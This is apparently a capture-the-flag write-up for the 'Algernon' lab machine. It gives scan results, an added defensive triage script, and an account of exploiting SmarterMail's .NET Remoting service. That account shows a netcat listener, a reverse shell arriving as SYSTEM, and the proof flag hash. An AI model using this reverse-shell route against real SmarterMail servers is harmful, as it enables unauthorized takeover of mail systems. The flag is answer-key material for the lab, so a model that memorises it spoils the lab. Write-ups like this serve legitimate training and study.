Algernon
Description
This machine had an RCE in the SmarterMail service that grants direct administrative privileges.
Enumeration
Nmap
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20 10:31PM <DIR> ImapRetrieval
| 05-03-22 01:38AM <DIR> Logs
| 04-29-20 10:31PM <DIR> PopRetrieval
|_04-29-20 10:32PM <DIR> Spool
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
7680/tcp open pando-pub?
9998/tcp open http Microsoft IIS httpd 10.0
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Thu, 02 Jun 2022 07:39:56 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
|_http-server-header: Microsoft-IIS/10.0
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
17001/tcp open remoting MS .NET Remoting services
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
http://192.168.169.65 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[192.168.169.65], Microsoft-IIS[10.0], Title[IIS Windows], X-Powered-By[ASP.NET]
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 30 Apr 2020 05:29:47 GMT
Accept-Ranges: bytes
ETag: "c692185db01ed61:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Thu, 02 Jun 2022 07:45:31 GMT
Content-Length: 696
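Added example, not part of the original write-up: a defender-side triage of the scan above. It parses a constructed excerpt of the nmap output and flags the findings that matter on this host: anonymous FTP, the TRACE verb, the SmarterMail interface on 9998 and the .NET Remoting endpoint on 17001. The `parse_ports` and `triage` helpers are assumptions of this example, not part of nmap or SmarterMail.

```python
import re

# Constructed excerpt of the nmap -sV output above, trimmed to the lines the checks need.
NMAP_OUTPUT = """\
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Microsoft IIS httpd 10.0
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
9998/tcp open http Microsoft IIS httpd 10.0
|_Requested resource was /interface/root
17001/tcp open remoting MS .NET Remoting services
"""

# Matches an nmap port line: "<port>/<proto> open <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return one dict per open port, with the NSE script lines that follow it."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "service": m.group(3),
                          "version": m.group(4).strip(), "scripts": []})
        elif line.startswith("|") and ports:
            # Script output lines start with "| " or "|_"; attach them to the last port.
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def triage(ports):
    """Flag exposures to act on; each rule is tied to a line in the scan above."""
    findings = []
    for p in ports:
        scripts = " ".join(p["scripts"])
        if p["service"] == "ftp" and "Anonymous FTP login allowed" in scripts:
            findings.append((p["port"], "anonymous FTP login enabled; disable or restrict it"))
        if "Potentially risky methods: TRACE" in scripts:
            findings.append((p["port"], "HTTP TRACE enabled; deny the verb in IIS request filtering"))
        if p["port"] == 9998 and "/interface/root" in scripts:
            findings.append((p["port"], "SmarterMail web interface reachable; confirm it is patched"))
        if "Remoting" in p["version"]:
            findings.append((p["port"], ".NET Remoting exposed to the network; restrict it to localhost"))
    return findings


if __name__ == "__main__":
    for port, note in triage(parse_ports(NMAP_OUTPUT)):
        print(f"{port}/tcp: {note}")
```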
Root Own
After visiting the web service on port 9998 I see a service called 'SmarterMail'. This service is vulnerable to RCE on port 17001. An exploit exists here. You only need to change the target IP and the local IP and start a netcat listener on port 4444.
root@kali:~/PG/Windows/192.168.169.180/xpl# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.49.169] from (UNKNOWN) [192.168.169.65] 49879
PS C:\Windows\system32> whoami
nt authority\system
The shell received has administrative privileges. GameOver.
Proof
PS C:\Users\Administrator\Desktop> type proof.txt
5646a8923a6b114ccd74b7b7f74393d9